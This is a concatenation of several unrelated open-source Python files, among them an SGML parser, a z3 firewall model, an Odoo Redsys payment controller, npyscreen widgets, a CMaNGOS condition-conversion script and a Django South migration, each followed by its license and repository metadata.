def parse_endtag(self, i):
rawdata = self.rawdata
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
tag = rawdata[i+2:j].strip().lower()
if rawdata[j] == '>':
j = j+1
self.finish_endtag(tag)
return j
# Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>)
def finish_shorttag(self, tag, data):
self.finish_starttag(tag, [])
self.handle_data(data)
self.finish_endtag(tag)
# Internal -- finish processing of start tag
# Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag
def finish_starttag(self, tag, attrs):
try:
method = getattr(self, 'start_' + tag)
except AttributeError:
try:
method = getattr(self, 'do_' + tag)
except AttributeError:
self.unknown_starttag(tag, attrs)
return -1
else:
self.handle_starttag(tag, method, attrs)
return 0
else:
self.stack.append(tag)
self.handle_starttag(tag, method, attrs)
return 1
# Internal -- finish processing of end tag
def finish_endtag(self, tag):
if not tag:
found = len(self.stack) - 1
if found < 0:
self.unknown_endtag(tag)
return
else:
if tag not in self.stack:
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
self.unknown_endtag(tag)
else:
self.report_unbalanced(tag)
return
found = len(self.stack)
for i in range(found):
if self.stack[i] == tag: found = i
while len(self.stack) > found:
tag = self.stack[-1]
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
method = None
if method:
self.handle_endtag(tag, method)
else:
self.unknown_endtag(tag)
del self.stack[-1]
# Overridable -- handle start tag
def handle_starttag(self, tag, method, attrs):
method(attrs)
# Overridable -- handle end tag
def handle_endtag(self, tag, method):
method()
# Example -- report an unbalanced </...> tag.
def report_unbalanced(self, tag):
if self.verbose:
print '*** Unbalanced </' + tag + '>'
print '*** Stack:', self.stack
def convert_charref(self, name):
"""Convert character reference, may be overridden."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 255:
return
return self.convert_codepoint(n)
def convert_codepoint(self, codepoint):
return chr(codepoint)
def handle_charref(self, name):
"""Handle character reference, no need to override."""
replacement = self.convert_charref(name)
if replacement is None:
self.unknown_charref(name)
else:
self.handle_data(replacement)
# Definition of entities -- derived classes may override
entitydefs = \
{'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''}
def convert_entityref(self, name):
"""Convert entity references.
        As an alternative to overriding this method, one can tailor the
results by setting up the self.entitydefs mapping appropriately.
"""
table = self.entitydefs
if name in table:
return table[name]
else:
return
def handle_entityref(self, name):
"""Handle entity references, no need to override."""
replacement = self.convert_entityref(name)
if replacement is None:
self.unknown_entityref(name)
else:
self.handle_data(self.convert_entityref(name))
# Example -- handle data, should be overridden
def handle_data(self, data):
pass
# Example -- handle comment, could be overridden
def handle_comment(self, data):
pass
# Example -- handle declaration, could be overridden
def handle_decl(self, decl):
pass
# Example -- handle processing instruction, could be overridden
def handle_pi(self, data):
pass
# To be overridden -- handlers for unknown objects
def unknown_starttag(self, tag, attrs): pass
def unknown_endtag(self, tag): pass
def unknown_charref(self, ref): pass
def unknown_entityref(self, ref): pass
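# A minimal sketch (not part of the original module) of the derived-class pattern
# described above: start_foo/end_foo handle <foo>...</foo>, do_foo handles a
# standalone <foo>, and handle_data receives the text in between. The tag names
# and collected attributes are illustrative only.
class ExampleLinkParser(SGMLParser):
    def reset(self):
        SGMLParser.reset(self)
        self.links = []
        self.pieces = []
    def start_a(self, attrs):
        # attrs is a list of (name, value) pairs with names lower-cased
        self.links.extend(value for name, value in attrs if name == 'href')
    def end_a(self):
        pass
    def do_br(self, attrs):
        # <br> has no matching end tag, so it is handled with do_br
        self.pieces.append('\n')
    def handle_data(self, data):
        self.pieces.append(data)
# Usage sketch:
#   p = ExampleLinkParser()
#   p.feed('<a href="http://example.com/">example</a><br>done')
#   p.close()
#   p.links == ['http://example.com/']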
class TestSGMLParser(SGMLParser):
def __init__(self, verbose=0):
self.testdata = ""
SGMLParser.__init__(self, verbose)
def handle_data(self, data):
self.testdata = self.testdata + data
if len(repr(self.testdata)) >= 70:
self.flush()
def flush(self):
data = self.testdata
if data:
self.testdata = ""
print 'data:', repr(data)
def handle_comment(self, data):
self.flush()
r = repr(data)
if len(r) > 68:
r = r[:32] + '...' + r[-32:]
print 'comment:', r
def unknown_starttag(self, tag, attrs):
self.flush()
if not attrs:
print 'start tag: <' + tag + '>'
else:
print 'start tag: <' + tag,
for name, value in attrs:
print name + '=' + '"' + value + '"',
print '>'
def unknown_endtag(self, tag):
self.flush()
print 'end tag: </' + tag + '>'
def unknown_entityref(self, ref):
self.flush()
print '*** unknown entity ref: &' + ref + ';'
def unknown_charref(self, ref):
self.flush()
print '*** unknown char ref: &#' + ref + ';'
def unknown_decl(self, data):
self.flush()
print '*** unknown decl: [' + data + ']'
def close(self):
SGMLParser.close(self)
self.flush()
def test(args = None):
import sys
if args is None:
args = sys.argv[1:]
if args and args[0] == '-s':
args = args[1:]
klass = SGMLParser
else:
klass = TestSGMLParser
if args:
file = args[0]
else:
file = 'test.html'
if file == '-':
f = sys.stdin
else:
try:
f = open(file, 'r')
except IOError, msg:
print file, ":", msg
sys.exit(1)
data = f.read()
if f is not sys.stdin:
f.close()
x = klass()
for c in data:
x.feed(c)
x.close()
if __name__ == '__main__':
test()
|
gpl-3.0
|
apanda/modeling
|
mcnet/components/aclfirewall.py
|
1
|
2245
|
from . import NetworkObject
import z3
class AclFirewall (NetworkObject):
def _init(self, node, network, context):
super(AclFirewall, self).init_fail(node)
self.fw = node.z3Node
self.ctx = context
self.constraints = list ()
self.acls = list ()
network.SaneSend (self)
self._firewallSendRules ()
@property
def z3Node (self):
return self.fw
def SetPolicy (self, policy):
"""Wrap add acls"""
self.AddAcls(policy)
def AddAcls(self, acls):
if not isinstance(acls, list):
acls = [acls]
self.acls.extend(acls)
@property
def ACLs(self):
return self.acls
def _addConstraints(self, solver):
solver.add(self.constraints)
self._aclConstraints(solver)
def _firewallSendRules(self):
p_0 = z3.Const('%s_firewall_send_p_0'%(self.fw), self.ctx.packet)
n_0 = z3.Const('%s_firewall_send_n_0'%(self.fw), self.ctx.node)
n_1 = z3.Const('%s_firewall_send_n_1'%(self.fw), self.ctx.node)
t_0 = z3.Int('%s_firewall_send_t_0'%(self.fw))
t_1 = z3.Int('%s_firewall_send_t_1'%(self.fw))
self.acl_func = z3.Function('%s_acl_func'%(self.fw), self.ctx.address, self.ctx.address, z3.BoolSort())
self.constraints.append(z3.ForAll([n_0, p_0, t_0],
z3.Implies(self.ctx.send(self.fw, n_0, p_0, t_0), \
z3.Exists([t_1], \
z3.And(t_1 < t_0, \
z3.Not(self.failed(t_1)), \
z3.Not(self.failed(t_0)), \
z3.Exists([n_1], \
self.ctx.recv(n_1, self.fw, p_0, t_1)), \
z3.Not(self.acl_func(self.ctx.packet.src(p_0), self.ctx.packet.dest(p_0))))))))
def _aclConstraints(self, solver):
if len(self.acls) == 0:
return
a_0 = z3.Const('%s_firewall_acl_a_0'%(self.fw), self.ctx.address)
a_1 = z3.Const('%s_firewall_acl_a_1'%(self.fw), self.ctx.address)
acl_map = map(lambda (a, b): z3.Or(z3.And(a_0 == a, a_1 == b), z3.And(a_0 == b, a_1 == a)), self.acls)
solver.add(z3.ForAll([a_0, a_1], self.acl_func(a_0, a_1) == z3.Or(acl_map)))
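# Usage sketch (illustrative, not part of the original module): once the network
# model has created an AclFirewall node, address pairs can be blacklisted; the
# host names below are assumptions about the surrounding mcnet API.
#   fw.AddAcls([(host_a.address, host_b.address)])  # drop traffic between a and b
#   fw.SetPolicy((host_c.address, host_d.address))  # same effect via the policy wrapper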
|
bsd-3-clause
|
Endika/l10n-spain
|
payment_redsys/controllers/main.py
|
8
|
2358
|
# -*- coding: utf-8 -*-
import logging
import pprint
import werkzeug
from openerp import http, SUPERUSER_ID
from openerp.http import request
from openerp.addons.website_sale.controllers.main import website_sale
_logger = logging.getLogger(__name__)
class RedsysController(http.Controller):
_return_url = '/payment/redsys/return'
_cancel_url = '/payment/redsys/cancel'
_exception_url = '/payment/redsys/error'
_reject_url = '/payment/redsys/reject'
@http.route([
'/payment/redsys/return',
'/payment/redsys/cancel',
'/payment/redsys/error',
'/payment/redsys/reject',
], type='http', auth='none')
def redsys_return(self, **post):
""" Redsys."""
_logger.info('Redsys: entering form_feedback with post data %s',
pprint.pformat(post))
if post:
request.registry['payment.transaction'].form_feedback(
request.cr, SUPERUSER_ID, post, 'redsys',
context=request.context)
return_url = post.pop('return_url', '')
if not return_url:
return_url = '/shop'
return werkzeug.utils.redirect(return_url)
@http.route(
['/payment/redsys/result/<page>'], type='http', auth='public',
methods=['GET'], website=True)
def redsys_result(self, page, **vals):
try:
sale_order_id = request.session.get('sale_last_order_id')
sale_obj = request.env['sale.order']
order = sale_obj.sudo().browse(sale_order_id)
res = {
'order': order,
}
return request.render('payment_redsys.%s' % str(page), res)
except:
return request.render('website.404')
class WebsiteSale(website_sale):
@http.route(['/shop/payment/transaction/<int:acquirer_id>'], type='json',
auth="public", website=True)
def payment_transaction(self, acquirer_id):
tx_id = super(WebsiteSale, self).payment_transaction(acquirer_id)
cr, context = request.cr, request.context
acquirer_obj = request.registry.get('payment.acquirer')
acquirer = acquirer_obj.browse(
cr, SUPERUSER_ID, acquirer_id, context=context)
if acquirer.provider == 'redsys':
request.website.sale_reset(context=request.context)
return tx_id
|
agpl-3.0
|
marcoapintoo/pypro
|
lib/npyscreen/fmFormMuttActive.py
|
15
|
8938
|
import weakref
import re
import curses
import collections
from . import fmFormMutt
from . import fmFormWithMenus
from . import npysNPSFilteredData
from . import wgtextbox
# This file defines Action Controllers
# and Widgets
# and Forms
##########################################################################################
# Action Controllers
##########################################################################################
class ActionControllerSimple(object):
def __init__(self, parent=None):
try:
self.parent = weakref.proxy(parent)
except:
self.parent = parent
self._action_list = []
self.create()
def create(self):
pass
def add_action(self, ident, function, live):
ident = re.compile(ident)
self._action_list.append({'identifier': ident,
'function': function,
'live': live
})
def process_command_live(self, command_line, control_widget_proxy):
for a in self._action_list:
if a['identifier'].match(command_line) and a['live']==True:
a['function'](command_line, control_widget_proxy, live=True)
def process_command_complete(self, command_line, control_widget_proxy):
for a in self._action_list:
if a['identifier'].match(command_line):
a['function'](command_line, control_widget_proxy, live=False)
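# A hedged sketch (not part of the original module) of the usual subclassing
# pattern: create() registers a regex-triggered command via add_action(), and the
# handler receives the typed command line plus a proxy of the command widget.
# The '/pattern' search syntax and the filtered-data plumbing are assumptions
# modelled on FormMuttActive below.
class ExampleSearchController(ActionControllerSimple):
    def create(self):
        # live=True: re-run the handler on every keystroke that matches the regex
        self.add_action('^/.*', self.set_search, True)
    def set_search(self, command_line, widget_proxy, live):
        # The parent form is assumed to hold an NPSFilteredData-style value and
        # a main widget named wMain (as FormMuttActive provides).
        self.parent.value.set_filter(command_line[1:])
        self.parent.wMain.values = self.parent.value.get()
        self.parent.wMain.display()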
##########################################################################################
# Widgets
##########################################################################################
class TextCommandBox(wgtextbox.Textfield):
def __init__(self, screen,
history=False,
history_max=100,
set_up_history_keys=False,
*args, **keywords):
super(TextCommandBox, self).__init__(screen, *args, **keywords)
self.history = history
self._history_store = collections.deque(maxlen=history_max)
self._current_history_index = False
self._current_command = None
if set_up_history_keys:
self.set_up_history_keys()
# History functions currently not complete.
def set_up_handlers(self):
super(TextCommandBox, self).set_up_handlers()
self.handlers.update({
curses.ascii.NL: self.h_execute_command,
curses.ascii.CR: self.h_execute_command,
})
def set_up_history_keys(self):
self.handlers.update({
"^P": self.h_get_previous_history,
"^N": self.h_get_next_history,
curses.KEY_UP: self.h_get_previous_history,
curses.KEY_DOWN: self.h_get_next_history,
})
def h_get_previous_history(self, ch):
if self._current_history_index is False:
self._current_command = self.value
_current_history_index = -1
else:
_current_history_index = self._current_history_index - 1
try:
self.value = self._history_store[_current_history_index]
except IndexError:
return True
self.cursor_position = len(self.value)
self._current_history_index = _current_history_index
self.display()
def h_get_next_history(self, ch):
if self._current_history_index is False:
return True
elif self._current_history_index == -1:
self.value = self._current_command
self._current_history_index = False
self.cursor_position = len(self.value)
self.display()
return True
else:
_current_history_index = self._current_history_index + 1
try:
self.value = self._history_store[_current_history_index]
except IndexError:
return True
self.cursor_position = len(self.value)
self._current_history_index = _current_history_index
self.display()
def h_execute_command(self, *args, **keywords):
if self.history:
self._history_store.append(self.value)
self._current_history_index = False
self.parent.action_controller.process_command_complete(self.value, weakref.proxy(self))
self.value = ''
def when_value_edited(self):
super(TextCommandBox, self).when_value_edited()
if self.editing:
self.parent.action_controller.process_command_live(self.value, weakref.proxy(self))
else:
self.parent.action_controller.process_command_complete(self.value, weakref.proxy(self))
class TextCommandBoxTraditional(TextCommandBox):
# EXPERIMENTAL
# WILL PASS INPUT TO A LINKED WIDGET - THE LINKED WIDGET
# UNLESS PUT IN TO COMMAND LINE MODE BY THE ENTRY OF BEGINNING_OF_COMMAND_LINE_CHARS
# WILL NEED TO BE ALTERED TO LOOK AS IF IT IS BEING EDITED TOO.
BEGINNING_OF_COMMAND_LINE_CHARS = (":", "/")
def __init__(self, screen,
history=True,
history_max=100,
set_up_history_keys=True,
*args, **keywords):
super(TextCommandBoxTraditional, self).__init__(screen,
history=history,
history_max=history_max,
set_up_history_keys=set_up_history_keys,
*args, **keywords
)
self.linked_widget = None
self.always_pass_to_linked_widget = []
def handle_input(self, inputch):
try:
inputchstr = chr(inputch)
except:
inputchstr = False
try:
input_unctrl = curses.ascii.unctrl(inputch)
except TypeError:
input_unctrl = False
if not self.linked_widget:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
if (inputch in self.always_pass_to_linked_widget) or \
(inputchstr in self.always_pass_to_linked_widget) or \
(input_unctrl in self.always_pass_to_linked_widget):
rtn = self.linked_widget.handle_input(inputch)
self.linked_widget.update()
return rtn
if inputchstr and (self.value == '' or self.value == None):
if inputchstr in self.BEGINNING_OF_COMMAND_LINE_CHARS or \
inputch in self.BEGINNING_OF_COMMAND_LINE_CHARS:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
if self.value:
return super(TextCommandBoxTraditional, self).handle_input(inputch)
rtn = self.linked_widget.handle_input(inputch)
self.linked_widget.update()
return rtn
##########################################################################################
# Form Classes
##########################################################################################
class FormMuttActive(fmFormMutt.FormMutt):
DATA_CONTROLER = npysNPSFilteredData.NPSFilteredDataList
ACTION_CONTROLLER = ActionControllerSimple
COMMAND_WIDGET_CLASS = TextCommandBox
def __init__(self, *args, **keywords):
# first create action_controller, so that the create methods
# of forms can use it.
self.action_controller = self.ACTION_CONTROLLER(parent=self)
# then call the superclass init method.
super(FormMuttActive, self).__init__(*args, **keywords)
self.set_value(self.DATA_CONTROLER())
class FormMuttActiveWithMenus(FormMuttActive, fmFormWithMenus.FormBaseNewWithMenus):
def __init__(self, *args, **keywords):
super(FormMuttActiveWithMenus, self).__init__(*args, **keywords)
self.initialize_menus()
class FormMuttActiveTraditional(fmFormMutt.FormMutt):
DATA_CONTROLER = npysNPSFilteredData.NPSFilteredDataList
ACTION_CONTROLLER = ActionControllerSimple
COMMAND_WIDGET_CLASS = TextCommandBoxTraditional
def __init__(self, *args, **keywords):
# First create action_controller so that create methods of forms
# can use it.
self.action_controller = self.ACTION_CONTROLLER(parent=self)
super(FormMuttActiveTraditional, self).__init__(*args, **keywords)
self.set_value(self.DATA_CONTROLER())
self.wCommand.linked_widget = self.wMain
self.wMain.editable = False
self.wMain.always_show_cursor = True
# special mouse handling
self.wMain.interested_in_mouse_even_when_not_editable = True
class FormMuttActiveTraditionalWithMenus(FormMuttActiveTraditional,
fmFormWithMenus.FormBaseNewWithMenus):
def __init__(self, *args, **keywords):
super(FormMuttActiveTraditionalWithMenus, self).__init__(*args, **keywords)
self.initialize_menus()
|
mit
|
mynew1/mangos-classic
|
contrib/convertConditions/ConvertConditions.py
|
91
|
13340
|
#
# This file is part of the CMaNGOS Project. See AUTHORS file for Copyright information
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
import MySQLdb as mdb
import sys
#global Variables (change as required)
host = "localhost"
user = "mangos"
passw = "mangos"
# databases format: list of [name, expansion]
databases = [ ["mangos", 2] ]
#databases = [ ["zero_db", 0], ["tbcdb", 1], ["udb_clean", 2], ["ytdb", 2] ]
# Should the current conditions table be loaded? (useful for appending custom content)
loadOldConditions = 0
# database, from which the conditions table will be loaded
database = databases[0][0]
#database = "mangos_custom"
# be very chatty with debug output
debug = 0
# global variables for internal use
false = 0
true = 1
processNumConditions = 0
fUpdates = 0
# Some Helper functions, main code at the bottom
def isSameCondition(c1, v11, v12, c2, v21, v22):
return (c1 == c2) and (v11 == v21) and (v12 == v22)
#
def compareCondition(c1, v11, v12, c2, v21, v22):
if (c1 > c2):
return true
if (c1 == c2):
if (v11 > v21):
return true
if (v11 == v21):
if (v12 > v22):
return true
return false
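# Illustrative example (not in the original script): compareCondition(2, 5, 0, 2, 3, 9)
# returns true because the condition types match (2 == 2) and v11 > v21 (5 > 3).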
#
def insertCondition(c, v1, v2):
global old_max
old_max = old_max + 1
linkedList.append( [old_max, c, v1, v2, database] )
if (debug):
print "Inserted: [%d, %d, %d, %d], (%s)" % (old_max, c, v1, v2, database)
#
def findCondition(c, v1, v2):
for entry in linkedList:
if (isSameCondition(c, v1, v2, entry[1], entry[2], entry[3])):
return entry[0]
return 0
#
# Function that processes table tableName for keys keyName1, keyName2, parses the conditions of conditionString, which must select numberOfConditions conditions
def progressTable(tableName, keyName1, keyName2, conditionString, numberOfConditions):
global old_max
global processNumConditions
global fUpdates
try:
con = mdb.connect(host, user, passw, database);
cur = con.cursor()
cur.execute('SELECT %s, %s, %s FROM %s; ' % (keyName1, keyName2, conditionString, tableName))
result = cur.fetchall()
if (debug):
print 'ProgressTable %s in database %s' % (tableName, database)
for row in result:
key1 = row[0]
key2 = row[1]
            c1 = v11 = v12 = c2 = v21 = v22 = c3 = v31 = v32 = 0
c1 = row[2]
v11 = row[3]
v12 = row[4]
if (numberOfConditions >= 2):
c2 = row[5]
v21 = row[6]
v22 = row[7]
if (numberOfConditions >= 3):
c3 = row[8]
v31 = row[9]
v32 = row[10]
            # Order the conditions of one row from big to small
if (numberOfConditions >= 2) and (compareCondition(c2, v21, v22, c1, v11, v12)):
c1, v11, v12, c2, v21, v22 = c2, v21, v22, c1, v11, v12
if (numberOfConditions >= 3):
if (compareCondition(c3, v31, v32, c2, v21, v22)):
c2, v21, v22, c3, v31, v32 = c3, v31, v32, c2, v21, v22
if (compareCondition(c2, v21, v22, c1, v11, v12)):
c1, v11, v12, c2, v21, v22 = c2, v21, v22, c1, v11, v12
# How many conditions do we have?
rowConditionNumber = 0
if (c1 > 0):
rowConditionNumber = rowConditionNumber + 1
if (c2 > 0):
rowConditionNumber = rowConditionNumber + 1
if (c3 > 0):
rowConditionNumber = rowConditionNumber + 1
if (rowConditionNumber == 0): #nothing to do
continue;
if (debug):
print "Condition(s) for Key (%d, %d): %d, %d, %d -- %d, %d, %d -- %d, %d, %d" % (key1, key2, c1, v11, v12, c2, v21, v22, c3, v31, v32)
# Just insert
if (processNumConditions == 0):
if (rowConditionNumber >= 1 and findCondition(c1, v11, v12) == 0):
insertCondition(c1, v11, v12)
if (rowConditionNumber >= 2 and findCondition(c2, v21, v22) == 0):
insertCondition(c2, v21, v22)
if (rowConditionNumber >= 3 and findCondition(c3, v31, v32) == 0):
insertCondition(c3, v31, v32)
continue
#
# Currently processing?
if (processNumConditions != rowConditionNumber):
continue
founds = [0, 0, 0]
countFound = 0 # helper for error
if (rowConditionNumber >= 1):
founds[0] = findCondition(c1, v11, v12)
if (founds[0] > 0):
countFound = countFound + 1
if (rowConditionNumber >= 2):
founds[1] = findCondition(c2, v21, v22)
if (founds[1] > 0):
countFound = countFound + 1
if (rowConditionNumber >= 3):
founds[2] = findCondition(c3, v31, v32)
if (founds[2] > 0):
countFound = countFound + 1
if (countFound != rowConditionNumber):
print 'An error happened for: Condition(s) for Key (%d, %d): %d, %d, %d -- %d, %d, %d -- %d, %d, %d' % (key1, key2, c1, v11, v12, c2, v21, v22, c3, v31, v32)
continue
last_point = 0
#3-vector condition
if (rowConditionNumber == 3):
# search for 2 match
notSearched = [0, 0, 0]
notSearched[2] = findCondition(-1, founds[0], founds[1])
if (notSearched[2] == 0):
notSearched[2] = findCondition(-1, founds[1], founds[0])
notSearched[1] = findCondition(-1, founds[0], founds[2])
if (notSearched[1] == 0):
notSearched[1] = findCondition(-1, founds[2], founds[0])
notSearched[0] = findCondition(-1, founds[1], founds[2])
if (notSearched[0] == 0):
notSearched[0] = findCondition(-1, founds[2], founds[1])
if (notSearched == [0, 0, 0]): # nothing found
insertCondition(-1, founds[1], founds[2])
notSearched[0] = old_max
for i in range(0, 3):
if (notSearched[i] > 0):
last_point = findCondition(-1, notSearched[i], founds[i])
if (last_point == 0):
last_point = findCondition(-1, founds[i], notSearched[i])
if (last_point > 0):
break
if (last_point == 0):
for i in range(0, 3):
if (notSearched[i] > 0):
insertCondition(-1, founds[i], notSearched[i])
last_point = old_max
break
#2-vector condition
if (rowConditionNumber == 2):
# search for 2 match
last_point = findCondition(-1, founds[1], founds[0])
if (last_point == 0):
last_point = findCondition(-1, founds[0], founds[1])
if (last_point == 0):
#Not found, insert list
insertCondition(-1, founds[1], founds[0])
last_point = old_max
#1-vector condition
if (rowConditionNumber == 1):
last_point = founds[0]
# Now we must have last_point > 0 (for a condition), and linking to proper place
if (last_point > 0 and processNumConditions > 0):
#cur.execute('UPDATE %s SET condition_id=%d WHERE %s=%d AND %s=%d; ' % (tableName, last_point, keyName1, key1, keyName2, key2))
print >> fUpdates, 'UPDATE %s SET condition_id=%d WHERE %s=%d AND %s=%d;' % (tableName, last_point, keyName1, key1, keyName2, key2)
except mdb.Error, e:
print 'Error %d, %s' % (e.args[0], e.args[1])
sys.exit(1)
finally:
if con:
con.close()
## End of Helper function
linkedList = []
old_max = 0
linkedList.append( [0, 0, 0, 0, 'initial fill'] )
# Extract old conditions
if (loadOldConditions):
try:
con = mdb.connect(host, user, passw, database);
cur = con.cursor()
cur.execute('SELECT condition_entry, type, value1, value2 FROM conditions')
for row in cur:
linkedList.append( [row[0], row[1], row[2], row[3], 'reloaded from %s' % database ] )
old_max = old_max + 1
if (row[0] != old_max):
print 'An error happened at old_max=%d, entry=%d' % (old_max, row[0])
print 'Loaded %d values from %s conditions table' % (old_max, database)
except mdb.Error, e:
print 'Error %d, %s' % (e.args[0], e.args[1])
sys.exit(1)
finally:
if con:
con.close()
#
start_entry=old_max
def doTables(db):
global processNumConditions
global fUpdates
global database
database = db[0]
print 'Processing database %s (%d vector conditions)' % (database, processNumConditions)
try:
if (processNumConditions == 0):
fUpdates = open("%s_updates.sql" % database, "w")
else:
fUpdates = open("%s_updates.sql" % database, "a")
if (processNumConditions <= 1):
progressTable("reference_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("creature_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("gameobject_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("pickpocketing_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("item_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("fishing_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("skinning_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("disenchant_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("mail_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
# Not all expansions have all tables
if (db[1] >= 1):
progressTable("prospecting_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
if (db[1] >= 2):
progressTable("spell_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
progressTable("milling_loot_template", "entry", "item", "lootcondition, condition_value1, condition_value2", 1)
if (processNumConditions < 3):
progressTable("gossip_menu", "entry", "text_id", "cond_1, cond_1_val_1, cond_1_val_2, cond_2, cond_2_val_1, cond_2_val_2", 2)
progressTable("gossip_menu_option", "menu_id", "id", "cond_1, cond_1_val_1, cond_1_val_2, cond_2, cond_2_val_1, cond_2_val_2, cond_3, cond_3_val_1, cond_3_val_2", 3)
except:
print "An error happened here"
sys.exit(1)
finally:
fUpdates.close()
# end of helper function doTables
try:
fConditions = open("conditions_dump.sql", "w")
if (debug):
print 'Opened conditions_dump.sql successfully'
for i in range (0, 4):
processNumConditions = i
for db in databases:
doTables(db)
print 'Inserted %d rows for database %s' % (old_max - start_entry, database)
start_entry = old_max
print 'Processed database(s): %s' % databases
#create dump
print >> fConditions, 'TRUNCATE conditions;'
print >> fConditions, 'INSERT INTO conditions VALUES'
for i in range(1, old_max):
if (linkedList[i][0] != i):
print 'AN ERROR HAPPENED for i=%d, liLi[i].entry=%d' % (i, linkedList[i][0])
print >> fConditions, '(%d, %d, %d, %d), -- %s' % (linkedList[i][0], linkedList[i][1], linkedList[i][2], linkedList[i][3], linkedList[i][4])
i = old_max
print >> fConditions, '(%d, %d, %d, %d); -- %s' % (linkedList[i][0], linkedList[i][1], linkedList[i][2], linkedList[i][3], linkedList[i][4])
except:
print "An error happened"
sys.exit(1)
finally:
fConditions.close()
|
gpl-2.0
|
ISIFoundation/influenzanet-website
|
apps/survey/migrations/0010_auto__del_extraresponse.py
|
4
|
12336
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
if raw_input("""Do you want to remove the table for survey.ExtraResponse?
This was at some point added for the British site as a hack, and is now no longer supported.
If the table contains valuable data, or you're not sure, you'll probably want to answer "No" to this question. [y/N] """).lower().startswith('y'):
print "Deleting model 'ExtraResponse'"
db.delete_table('survey_extraresponse')
def backwards(self, orm):
# Adding model 'ExtraResponse'
db.create_table('survey_extraresponse', (
('data', self.gf('django.db.models.fields.TextField')(default=None, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('participation', self.gf('django.db.models.fields.related.ForeignKey')(default=None, to=orm['survey.Participation'], null=True)),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['survey.SurveyUser'])),
))
db.send_create_signal('survey', ['ExtraResponse'])
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'survey.lastresponse': {
'Meta': {'object_name': 'LastResponse'},
'data': ('django.db.models.fields.TextField', [], {'default': 'None', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'participation': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['survey.Participation']", 'null': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['survey.SurveyUser']", 'unique': 'True'})
},
'survey.localflusurvey': {
'Meta': {'object_name': 'LocalFluSurvey'},
'age_user': ('django.db.models.fields.SmallIntegerField', [], {}),
'data': ('django.db.models.fields.TextField', [], {}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
